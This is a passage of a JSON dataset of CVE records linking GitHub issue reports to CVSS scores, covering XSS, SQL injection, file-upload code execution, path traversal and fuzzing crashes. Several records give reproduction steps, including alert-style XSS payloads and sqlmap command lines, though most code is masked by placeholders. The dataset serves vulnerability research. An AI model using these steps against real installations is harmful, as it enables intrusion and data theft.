        "description": "Cross Site Scripting (XSS). Describe the bug Cross Site Scripting (XSS) via upload image function To Reproduce Steps to reproduce the behavior NUMBERTAG Login to flatcore CMS NUMBERTAG Click on APITAG file NUMBERTAG Drop svg file contains XSS payload , example filename : xss.svg NUMBERTAG and XSS in url : FILETAG Screenshots FILETAG xss.svg CODETAG Desktop (please complete the following information): OS: All Browser : All Version : Last version Additional context XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-3962",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/4446",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/4446",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2021-11-06T05:20:44Z",
        "description": "heap use after free in magick at dcm.c APITAG APITAG version NUMBERTAG Operating system Linux Operating system, version and so on OS: Ubuntu NUMBERTAG LTS Version: APITAG NUMBERTAG Q NUMBERTAG HDRI NUMBERTAG FILETAG Copyright: (C NUMBERTAG APITAG Studio Delegates (built in): fontconfig freetype jng jpeg lzma pangocairo png x xml zlib Compiler: gcc NUMBERTAG Description Hello, We are currently working on fuzz testing feature, and we found a heap use after free on magick . Steps to Reproduce build it APITAG run it APITAG output APITAG double free detected in tcache NUMBERTAG When I compile in ASAN mode APITAG APITAG NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG f NUMBERTAG at pc NUMBERTAG f0f NUMBERTAG c bp NUMBERTAG ffe3d8a7fd0 sp NUMBERTAG ffe3d8a7fc8 READ of size NUMBERTAG at NUMBERTAG f NUMBERTAG thread T NUMBERTAG f0f NUMBERTAG b in APITAG PATHTAG NUMBERTAG f NUMBERTAG eb8 in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG d3 in APITAG PATHTAG NUMBERTAG bd NUMBERTAG in APITAG PATHTAG NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG dfd NUMBERTAG bf6 in __libc_start_main PATHTAG NUMBERTAG e NUMBERTAG in _start ( PATHTAG NUMBERTAG f NUMBERTAG is located NUMBERTAG bytes inside of NUMBERTAG byte region FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-40145",
        "Issue_Url_old": "https://github.com/libgd/libgd/issues/700",
        "Issue_Url_new": "https://github.com/libgd/libgd/issues/700",
        "Repo_new": "libgd/libgd",
        "Issue_Created_At": "2021-05-26T08:24:45Z",
        "description": "APITAG memory leak. Hello, I found that APITAG in gd_gd.c and APITAG in gd_webp.c are similar functions for different picture formats. You have changed APITAG because of CVETAG (double free), So It seems that you need to change APITAG too. I run two test files with ASAN, and the result is shown below. The test files are located in the 'tests/webp' folder. Test1: CODETAG ASAN result: ERRORTAG Test2: CODETAG ASAN result: ERRORTAG Is there another CVE here?",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-40153",
        "Issue_Url_old": "https://github.com/plougher/squashfs-tools/issues/72",
        "Issue_Url_new": "https://github.com/plougher/squashfs-tools/issues/72",
        "Repo_new": "plougher/squashfs-tools",
        "Issue_Created_At": "2019-09-10T17:09:19Z",
        "description": "unsquashfs unvalidated filepaths allow writing outside of destination. Squashfs stores the filename in the directory entry, this is then used by ERRORTAG to create the new file during the unsquash. The filename is not validated for traversal outside of the destination directory, this allows writing to locations outside of the destination, such as APITAG which could lead to code execution. To test this, the following change can be made to mksquashfs : URLTAG ERRORTAG Recompile mksquashfs and then create the \"bad\" squashfs image. The first example is using a directory traversal, (this is easiest done in a Docker container) ERRORTAG This works pretty well since the ERRORTAG ends up prepending the file data to an existing file, or creating the file+path if it does not exist. The same can be done with a symlink. Same steps as before except additional file is added to the poc folder: APITAG Attached are two poc squashfs images, one with directory traversal and the other with symlink. Both will end up creating the file APITAG ERRORTAG Sample squashfs images FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-40188",
        "Issue_Url_old": "https://github.com/PHPFusion/PHPFusion/issues/2372",
        "Issue_Url_new": "https://github.com/phpfusion/phpfusion/issues/2372",
        "Repo_new": "phpfusion/phpfusion",
        "Issue_Created_At": "2021-08-24T22:29:42Z",
        "description": "File Manager does not filter php extension lead to Upload malicious files. By APITAG From In NUMBERTAG cta team, HPT Cyber Security Center Describe the bug File Manager function in admin panel does not filter all of php extensions like FILETAG , .php7, .phtml, .php5, ...\", The attacker can upload malicious file and execute code in server Version APITAG version: APITAG NUMBERTAG To Reproduce Steps to reproduce the behavior NUMBERTAG Go to administrator panel and click on APITAG function NUMBERTAG Click on Upload file button, then choose .php file NUMBERTAG The path of file will return in response NUMBERTAG Finally, access and execute code on server Screenshots FILETAG Request and response of function FILETAG Execute code on server: FILETAG Additional context Although APITAG have NUMBERTAG step verification for administrator panel, but if cookie of admin users were stolen, the attacker can POST request upload file with that cookie and execute code on server REQUEST: ERRORTAG RESPONSE: CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2021-40191",
        "Issue_Url_old": "https://github.com/zyx0814/dzzoffice/issues/196",
        "Issue_Url_new": "https://github.com/zyx0814/dzzoffice/issues/196",
        "Repo_new": "zyx0814/dzzoffice",
        "Issue_Created_At": "2021-08-28T04:19:09Z",
        "description": "Lacking of sanitizer APITAG lead to Cross site Scripting in Upload function. Author: APITAG from NUMBERTAG n NUMBERTAG cta team, HPT APITAG Center Email: EMAILTAG Submit date: PATHTAG Target: FILETAG Version NUMBERTAG FILETAG Description: Because of lacking of sanitizer of input data at all of upload functions in APITAG and return wrong response content type of output data in APITAG , The Authenticated user (not an admin) can injection malicious code into APITAG and craft a specific html file, then user click on that file the script will be executed. To Reproduce Steps to reproduce the behavior NUMBERTAG Go to any textarea form and use upload function NUMBERTAG Inject malicious script into APITAG like <img src=x onerror=alert NUMBERTAG Craft an specific html file to send request to server in webclient, when user click on that file malicious script will be executed Request ERRORTAG IMAGE FILETAG FILETAG FILETAG FILETAG Response ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-4021",
        "Issue_Url_old": "https://github.com/radareorg/radare2/issues/19436",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/19436",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2021-11-23T14:42:29Z",
        "description": "APITAG analysing ELF NUMBERTAG binary for MIPS architecture. Environment ERRORTAG Description We found with MENTIONTAG an ELF NUMBERTAG binary for MIPS architecture that hangs when analysed. We think this is caused by mapping a huge section that is interpreted as NOPs. If we modify the size of the section, the analysis doesn't hang. While this is not an infinite loop, it can be very long. And this has been acknowledged as a APITAG in the past (see NUMBERTAG Test CODETAG APITAG ERRORTAG ERRORTAG CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-40239",
        "Issue_Url_old": "https://github.com/Gabe-commiter/Miniftpd/issues/2",
        "Issue_Url_new": "https://github.com/gabe-commiter/miniftpd/issues/2",
        "Repo_new": "gabe-commiter/miniftpd",
        "Issue_Created_At": "2021-08-24T18:07:12Z",
        "description": "APITAG trigger buffer overflow on APITAG function. Hi MENTIONTAG I found a issue, that can trigger buffer overflow on your application. The issue exists on APITAG function (from line NUMBERTAG to NUMBERTAG on ftpproto.c At glance, we can see you defined APITAG , it's not problem, however, when you use APITAG on line NUMBERTAG and NUMBERTAG they trigger bufferoverflow. ERRORTAG ERRORTAG Solution : Please use APITAG to limit maximum input characters. See: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-40292",
        "Issue_Url_old": "https://github.com/zyx0814/dzzoffice/issues/195",
        "Issue_Url_new": "https://github.com/zyx0814/dzzoffice/issues/195",
        "Repo_new": "zyx0814/dzzoffice",
        "Issue_Created_At": "2021-08-28T04:05:10Z",
        "description": "Lacking of sanitizer of input data lead to Stored XSS. Author: APITAG from NUMBERTAG n NUMBERTAG cta team, HPT APITAG Center Email: EMAILTAG Submit date: PATHTAG Target: FILETAG Version NUMBERTAG FILETAG Description: Because of lacking of sanitizer of input data, attacker can injection malicious code into settingnew param to trigger Stored XSS. The vulnerability can affected APITAG and APITAG in template FILETAG FILETAG XSS NUMBERTAG Steps to reproduce the behavior NUMBERTAG Go to Setting settings > Login settings NUMBERTAG Update Registration link name to APITAG NUMBERTAG Click Save changes Request CODETAG Response ERRORTAG APITAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-40313",
        "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1469",
        "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1469",
        "Repo_new": "piwigo/piwigo",
        "Issue_Created_At": "2021-08-29T05:50:52Z",
        "description": "FILETAG then i got APITAG The point of vulnerability is in APITAG parameter selection is not filtered FILETAG Unfiltered parametersselection is spliced FILETAG The next step is to capture packets using APITAG by simply constructing parameters APITAG Remember to replace the value of the token above FILETAG Save parameters to file\uff0cthen just use sqlmap to exploit python sqlmap.py r NUMBERTAG current db FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-40317",
        "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1470",
        "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1470",
        "Repo_new": "piwigo/piwigo",
        "Issue_Created_At": "2021-08-29T13:49:36Z",
        "description": "FILETAG Then we can see: FILETAG Select default, use Burpsuite during clicking APPLY. FILETAG Then in sqlmap: python sqlmap.py r FILETAG o APITAG FILETAG See APITAG FILETAG Here there seems to be no confirmation of the legitimacy of the parameter $_POST FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-4048",
        "Issue_Url_old": "https://github.com/JuliaLang/julia/issues/42415",
        "Issue_Url_new": "https://github.com/julialang/julia/issues/42415",
        "Repo_new": "julialang/julia",
        "Issue_Created_At": "2021-09-28T18:29:48Z",
        "description": "stegr! call segfault. MENTIONTAG alerted us to segfaults that were occurring on some machines during CI builds while running the APITAG test. Using rr, we were able to trace these segfaults back to a call to APITAG in lapack.jl URLTAG While we ran out of time to fully debug and fix this, we have a MWE that replicates the problem on AMD machines. Here's the MWE: CODETAG CC: MENTIONTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-40523",
        "Issue_Url_old": "https://github.com/contiki-os/contiki/issues/2686",
        "Issue_Url_new": "https://github.com/contiki-os/contiki/issues/2686",
        "Repo_new": "contiki-os/contiki",
        "Issue_Created_At": "2021-08-08T13:42:02Z",
        "description": "Incorrectly handling negotiated options of telnet servers. Hello, In the implementation of telnet servers until version NUMBERTAG and even the latest commit NUMBERTAG b5b NUMBERTAG telnet servers incorrectly handle negotiated options. According to the general constraints of RFC NUMBERTAG URLTAG , during negotiating some disabled command options or unnegotiated commands, telnet servers must give WILL/WONT or DO/DONT response for DO and WILL commands, respectively. However, telnet servers may not give any responses in this case. This bug appears as telnet servers put all responses in a fixed length buffer in the implementation. Telnet servers only put messages into buffer but don't have a check whether successfully or not. Hence, when the buffer is full, it can lead to responses lost. This bug could lead to clients waiting forever and other effects. Could you have a check? Thanks a lot.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-40541",
        "Issue_Url_old": "https://github.com/PHPFusion/PHPFusion/issues/2373",
        "Issue_Url_new": "https://github.com/phpfusion/phpfusion/issues/2373",
        "Repo_new": "phpfusion/phpfusion",
        "Issue_Created_At": "2021-08-25T03:33:12Z",
        "description": "Cross site Scripting bypass in APITAG function. APITAG From In NUMBERTAG cta Team, HPT Cyber Security Center Describe the bug preg patterns filter html tag without \"//\" in APITAG function, the authenticated user can trigger xss by append \"//\" in the end of text Version APITAG version: APITAG NUMBERTAG To Reproduce Steps to reproduce the behavior NUMBERTAG Go to any post textarea function NUMBERTAG Add \"<svg onload=alert NUMBERTAG in textarea form and submit NUMBERTAG When authenticated user or admin use preview html function the malicious script will be executed, even the attacker can store malicious script when admin publish submission Screenshots preg pattern filter html tag without \"//\" in the end of html FILETAG User preview and submit submission FILETAG Admin preview submission of user FILETAG Admin publish submission and the attacker can store malicious script FILETAG Additional context REQUEST: CODETAG RESPONSE: CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-40542",
        "Issue_Url_old": "https://github.com/OS4ED/openSIS-Classic/issues/189",
        "Issue_Url_new": "https://github.com/os4ed/opensis-classic/issues/189",
        "Repo_new": "os4ed/opensis-classic",
        "Issue_Created_At": "2021-09-01T09:41:11Z",
        "description": "Unauthenticated Reflect Cross site Scripting in FILETAG file. Author: APITAG from NUMBERTAG n NUMBERTAG cta team, HPT APITAG Center Email: EMAILTAG Submit date: PATHTAG Target: FILETAG Version NUMBERTAG FILETAG Description: Because of lacking of sanitizer of input data at APITAG in APITAG file, The Unauthenticated user can inject and execute javascript code on APITAG parameter FILETAG Testing on local site: FILETAG Testing on demo site: FILETAG To Reproduce XSS NUMBERTAG Steps to reproduce the behavior NUMBERTAG Acess APITAG file NUMBERTAG Add APITAG behind APITAG file NUMBERTAG The backend will echo and execute malicious script Request ERRORTAG Response ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-40543",
        "Issue_Url_old": "https://github.com/OS4ED/openSIS-Classic/issues/191",
        "Issue_Url_new": "https://github.com/os4ed/opensis-classic/issues/191",
        "Repo_new": "os4ed/opensis-classic",
        "Issue_Created_At": "2021-09-01T10:55:25Z",
        "description": "Unauthenticated SQL Injection in FILETAG file. Author: APITAG from NUMBERTAG n NUMBERTAG cta team, HPT APITAG Center Email: EMAILTAG Submit date: PATHTAG Target: FILETAG Version NUMBERTAG FILETAG Description: Because of lacking of sanitizer of input data at two parameters APITAG and APITAG in APITAG file, The Unauthenticated user can inject sql code and get all informations in database FILETAG Use sqlmap tool dump users of database FILETAG To Reproduce SQL INJECTION Steps to reproduce the behavior NUMBERTAG Acess APITAG file NUMBERTAG Add APITAG behind APITAG file Request CODETAG Response CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-40559",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1886",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1886",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-08-24T07:11:15Z",
        "description": "Segmentation fault casued by null pointer dereference using mp4box in naludmx_parse_nal_avc, APITAG FILETAG (unzip first) Here is the trace reported by gdb NUMBERTAG ac NUMBERTAG in naludmx_parse_nal_avc (ct NUMBERTAG a NUMBERTAG data NUMBERTAG f NUMBERTAG tr NUMBERTAG size NUMBERTAG e, nal_type NUMBERTAG skip_nal NUMBERTAG fffffff4fc4, is_slice NUMBERTAG fffffff4fd0, is_islice NUMBERTAG fffffff4fd4) at PATHTAG NUMBERTAG ad7d3 in naludmx_process (filter NUMBERTAG cbe0) at PATHTAG NUMBERTAG a0 in gf_filter_process_task (task NUMBERTAG eee0) at PATHTAG NUMBERTAG c in gf_fs_thread_proc (sess_thread NUMBERTAG e0) at PATHTAG NUMBERTAG in gf_fs_run (fsess NUMBERTAG at PATHTAG NUMBERTAG ea in gf_media_import (importer NUMBERTAG fffffff5bf0) at PATHTAG NUMBERTAG cdf9 in convert_file_info APITAG \"tmp\", APITAG at PATHTAG NUMBERTAG c3 in APITAG (argc NUMBERTAG arg NUMBERTAG fffffffddb8) at PATHTAG NUMBERTAG d6b in main (argc NUMBERTAG arg NUMBERTAG fffffffddb8) at PATHTAG NUMBERTAG caaa NUMBERTAG in generic_start_main NUMBERTAG caaff5 in __libc_start_main NUMBERTAG f NUMBERTAG in _start () ~~~~",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-40562",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1901",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1901",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-08-29T14:05:34Z",
        "description": "Segmentation fault caused by floating point exception using mp4box in naludmx_enqueue_or_dispatch, APITAG FILETAG (unzip first) Program output: ~~~~ [AVC|H NUMBERTAG Possible Variable Frame Rate: VUI \"fixed_frame_rate_flag\" absent [AVC|H NUMBERTAG Warning: Error parsing NAL unit [AVC|H NUMBERTAG Error parsing Sequence Param Set APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! [AVC|H NUMBERTAG Possible Variable Frame Rate: VUI \"fixed_frame_rate_flag\" absent [AVC|H NUMBERTAG Possible Variable Frame Rate: VUI \"fixed_frame_rate_flag\" absent [AVC|H NUMBERTAG Possible Variable Frame Rate: VUI \"fixed_frame_rate_flag\" absent [AVC|H NUMBERTAG Possible Variable Frame Rate: VUI \"fixed_frame_rate_flag\" absent [AVC|H NUMBERTAG Possible Variable Frame Rate: VUI \"fixed_frame_rate_flag\" absent Floating point exception (core dumped) ~~~~ Here is the trace reported by gdb: ~~~~ Stopped reason: SIGFPE gef\u27a4 bt NUMBERTAG ee NUMBERTAG in naludmx_enqueue_or_dispatch (ct NUMBERTAG ada NUMBERTAG n_pck NUMBERTAG flush_ref=<optimized out>) at PATHTAG NUMBERTAG e NUMBERTAG in naludmx_process APITAG at PATHTAG NUMBERTAG f4a in naludmx_process (filter NUMBERTAG a0bd0) at PATHTAG NUMBERTAG fe4c NUMBERTAG in gf_filter_process_task (task NUMBERTAG ed0) at PATHTAG NUMBERTAG f7b NUMBERTAG in gf_fs_thread_proc APITAG at PATHTAG NUMBERTAG f NUMBERTAG in gf_fs_run (fsess=fsess APITAG at PATHTAG NUMBERTAG c NUMBERTAG b4b in gf_media_import APITAG at PATHTAG NUMBERTAG in convert_file_info APITAG \"tmp\", APITAG at PATHTAG NUMBERTAG aaa in APITAG (argc=<optimized out>, argv=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG bb6 in generic_start_main NUMBERTAG f NUMBERTAG a5 in __libc_start_main NUMBERTAG c4e9 in _start () ~~~~",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-40563",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1892",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1892",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-08-25T07:12:15Z",
        "description": "Segmentation fault casued by null pointer dereference using mp4box in APITAG APITAG FILETAG (unzip first) Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef\u27a4 bt NUMBERTAG in APITAG (ctx=ctx APITAG dsi=dsi APITAG APITAG APITAG APITAG APITAG max_height NUMBERTAG fffffff4d NUMBERTAG max_enh_width NUMBERTAG fffffff4d NUMBERTAG APITAG sar NUMBERTAG fffffff4d NUMBERTAG at PATHTAG NUMBERTAG ab in naludmx_check_pid APITAG ctx=ctx APITAG at PATHTAG NUMBERTAG in naludmx_process (filter NUMBERTAG a0bd0) at PATHTAG NUMBERTAG fe4c NUMBERTAG in gf_filter_process_task (task NUMBERTAG ed0) at PATHTAG NUMBERTAG f7b NUMBERTAG in gf_fs_thread_proc APITAG at PATHTAG NUMBERTAG f NUMBERTAG in gf_fs_run (fsess=fsess APITAG at PATHTAG NUMBERTAG c NUMBERTAG b4b in gf_media_import APITAG at PATHTAG NUMBERTAG in convert_file_info APITAG \"tmp\", APITAG at PATHTAG NUMBERTAG aaa in APITAG (argc=<optimized out>, argv=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG bb6 in generic_start_main NUMBERTAG f NUMBERTAG a5 in __libc_start_main NUMBERTAG c4e9 in _start () ~~~~ The reason for this bug is that the program does not check the nullity of the pointer. APITAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-40565",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1902",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1902",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-08-29T14:14:22Z",
        "description": "Segmentation fault caused by null pointer dereference using mp4box in gf_avc_parse_nalu, APITAG FILETAG (unzip first) Program output: ~~~~ APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG corrupted exp golomb code NUMBERTAG leading zeros, ma NUMBERTAG allowed ! APITAG corrupted exp golomb code NUMBERTAG leading zeros, ma NUMBERTAG allowed ! APITAG corrupted exp golomb code NUMBERTAG leading zeros, ma NUMBERTAG allowed ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG corrupted exp golomb code NUMBERTAG leading zeros, ma NUMBERTAG allowed ! APITAG corrupted exp golomb code NUMBERTAG leading zeros, ma NUMBERTAG allowed ! APITAG corrupted exp golomb code NUMBERTAG leading zeros, ma NUMBERTAG allowed ! APITAG corrupted exp golomb code NUMBERTAG leading zeros, ma NUMBERTAG allowed ! APITAG corrupted exp golomb code NUMBERTAG leading zeros, ma NUMBERTAG allowed ! Segmentation fault (core dumped) ~~~~ Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef\u27a4 bt NUMBERTAG bd NUMBERTAG in gf_avc_parse_nalu (bs=<optimized out>, avc NUMBERTAG ae NUMBERTAG at PATHTAG NUMBERTAG d in naludmx_parse_nal_avc (is_islice=<synthetic pointer>, is_slice=<synthetic pointer>, skip_nal=<synthetic pointer>, nal_type NUMBERTAG size NUMBERTAG b, data NUMBERTAG e NUMBERTAG ct NUMBERTAG ada NUMBERTAG at PATHTAG NUMBERTAG naludmx_process (filter NUMBERTAG a0bd0) at PATHTAG NUMBERTAG fe4c NUMBERTAG in gf_filter_process_task (task NUMBERTAG d NUMBERTAG at PATHTAG NUMBERTAG f7b NUMBERTAG in gf_fs_thread_proc APITAG at PATHTAG NUMBERTAG f NUMBERTAG in gf_fs_run (fsess=fsess APITAG at PATHTAG NUMBERTAG c NUMBERTAG b4b in gf_media_import APITAG at PATHTAG NUMBERTAG in convert_file_info APITAG \"tmp\", APITAG at PATHTAG NUMBERTAG aaa in APITAG (argc=<optimized out>, argv=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG bb6 in generic_start_main NUMBERTAG f NUMBERTAG a5 in __libc_start_main NUMBERTAG c4e9 in _start () ~~~~",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-40566",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1887",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1887",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-08-24T08:04:48Z",
        "description": "Segmentation fault casued by null pointer dereference using mp4box in mpgviddmx_process, APITAG FILETAG (unzip first) Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef\u27a4 bt NUMBERTAG cf5a9b in memcpy NUMBERTAG a NUMBERTAG a7 in mpgviddmx_process (filter NUMBERTAG cbd0) at PATHTAG NUMBERTAG a0 in gf_filter_process_task (task NUMBERTAG a0e0) at PATHTAG NUMBERTAG c in gf_fs_thread_proc (sess_thread NUMBERTAG b0) at PATHTAG NUMBERTAG in gf_fs_run (fsess NUMBERTAG at PATHTAG NUMBERTAG ea in gf_media_import (importer NUMBERTAG fffffff5c NUMBERTAG at PATHTAG NUMBERTAG cdf9 in convert_file_info APITAG \"tmp\", APITAG at PATHTAG NUMBERTAG c3 in APITAG (argc NUMBERTAG arg NUMBERTAG fffffffdde8) at PATHTAG NUMBERTAG d6b in main (argc NUMBERTAG arg NUMBERTAG fffffffdde8) at PATHTAG NUMBERTAG caaa NUMBERTAG in generic_start_main NUMBERTAG caaff5 in __libc_start_main NUMBERTAG f NUMBERTAG in _start () ~~~~ The reason for this bug is that the program does not check the nullity of the pointer before copy memory to it. APITAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-40567",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1889",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1889",
        "Repo_new": "gpac/gpac",
